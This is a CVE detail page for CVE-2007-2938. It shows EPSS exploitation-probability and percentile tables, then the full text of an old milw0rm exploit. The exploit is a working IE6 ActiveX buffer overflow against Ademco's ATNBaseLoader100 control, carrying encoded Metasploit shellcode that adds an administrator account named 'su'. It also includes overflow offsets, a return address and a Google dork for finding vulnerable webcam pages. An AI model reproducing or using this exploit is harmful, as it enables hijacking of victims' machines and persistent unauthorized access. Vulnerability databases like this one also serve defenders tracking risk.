CVE-2007-2938 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	44.63%	–	–
2023-03-12	–	–	–	34.38%	–
2023-06-18	–	–	–	34.38%	–
2023-11-05	–	–	–	35.22%	–
2024-02-25	–	–	–	36.05%	–
2024-06-02	–	–	–	36.05%	–
2024-12-22	–	–	–	40.3%	–
2025-01-19	–	–	–	40.3%	–
2025-03-18	–	–	–	–	57.35%
2025-03-18	–	–	–	–	57.35,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2023-03-12	96%
2023-06-18	97%
2023-11-05	97%
2024-02-25	97%
2024-06-02	97%
2024-12-22	97%
2025-01-19	97%
2025-03-18	98%
2025-03-18	98%

<!-- IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6) remote buffer overflow exploit / XP SP2 it version by rgod site: retrogod.altervista.org this activex is installed browsing some webcam pages try this google dork: intitle:"Browser Launch Page" (dork credit: dragg, found in GHDB) object safety report: RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False here it is what happen, EIP is overwritten after 272 chars passed to Send485CMD method: EAX 00000001 ECX 0013EA7C ASCII "AAAA ... EDX 7EFF00E4 EBX 10007414 ESP 0013EB98 ASCII "AAAA ... EBP 41414141 ESI 0018022C EDI 00000000 EIP 41414141 SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable to less convenient overflows or seh overwrite --> <HTML> <OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT> <script language='vbscript'> 'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP NOP= String(12, unescape("%90")) EIP= unescape("%03%78%41%7e") 'call ESP user32.dll SunTzu=String(272, "A") + EIP + NOP + SCODE BaseRunner.Send485CMD SunTzu </script> </HTML> # milw0rm.com [2007-05-26]